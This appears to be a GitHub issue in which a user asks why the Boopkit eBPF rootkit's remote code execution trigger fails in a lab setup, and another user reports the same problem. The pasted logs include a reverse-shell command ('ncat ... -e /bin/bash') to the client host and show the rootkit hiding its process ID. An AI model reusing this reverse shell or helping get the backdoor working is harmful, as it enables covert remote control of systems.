We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
So I already compile Boopkit In the server side ip 10.10.10.10 I run the binary boopkit
In the client ip 10.10.10.8 i run the boopscript after i change the RHOST and the LHOST
RHOST = 10.10.10.10 LHOST = 10.10.10.8
The ports 22,3535,3545 open (inbound) from both side
When I try run it from the client
-> *[RCE] : ncat 10.10.10.8 3545 -e /bin/bash & -> *[Local] : 10.10.10.8:3535 -> *[Remote] : 10.10.10.10:22 ================================================================ -> [112 bytes] TX SYN : 10.10.10.10 (SOCK_RAW, RCE, *bad csum) -> [handshake] CONN : 10.10.10.10:22 -> [060 bytes] TX SYN : 10.10.10.10:22 <- [048 bytes] RX SYN-ACK : 10.10.10.10:22 (RCE) -> [060 bytes] TX ACK-RST : 10.10.10.10:22 -> [hanging..] CONN : 10.10.10.8:3535 (listen...)
From server side
================================================================ -> getuid() : 0 -> getpid() : 1246 -> getppid() : 1064 -> Logs : /sys/kernel/tracing/trace_pipe -> Loading eBPF Probe : /root/.boopkit/pr0be.safe.o -> Starting xCap Interface : lo -> Initalizing Ring Buffer -> eBPF Probe Loaded : /root/.boopkit/pr0be.safe.o -> Loading eBPF Probe : /root/.boopkit/pr0be.boop.o -> eBPF Probe Loaded : /root/.boopkit/pr0be.boop.o -> eBPF Program Attached : tp/tcp/tcp_bad_csum -> eBPF Program Attached : tp/tcp/tcp_receive_reset -> eBPF Map Name : event -> Obfuscating PID : 1246 -> xCap RingBuffer Started : lo ================================================================ ** Boop source: 10.10.10.8 -> Search xCap Ring Buffer: 10.10.10.8 -> Initalizing Ring Buffer -> Taking snapshot of network traffic. -> No RCE in xCap! -> Free Ring Buffer ** Boop source: 10.10.10.10 -> Search xCap Ring Buffer: 10.10.10.10 -> Initalizing Ring Buffer -> Taking snapshot of network traffic. -> No RCE in xCap! -> Free Ring Buffer ** Boop source: 10.10.10.10 -> Search xCap Ring Buffer: 10.10.10.10 -> Initalizing Ring Buffer -> Taking snapshot of network traffic. -> No RCE in xCap! -> Free Ring Buffer ** Boop source: 10.10.10.10 -> Search xCap Ring Buffer: 10.10.10.10 -> Initalizing Ring Buffer -> Taking snapshot of network traffic. -> No RCE in xCap! -> Free Ring Buffer
What I doing wrong?
The text was updated successfully, but these errors were encountered:
me too, I also want to know how to fix it
Sorry, something went wrong.
No branches or pull requests
So I already compile Boopkit
In the server side ip 10.10.10.10 I run the binary boopkit
In the client ip 10.10.10.8 i run the boopscript after i change the RHOST and the LHOST
RHOST = 10.10.10.10
LHOST = 10.10.10.8
The ports 22,3535,3545 open (inbound) from both side
When I try run it from the client
From server side
What I doing wrong?
The text was updated successfully, but these errors were encountered: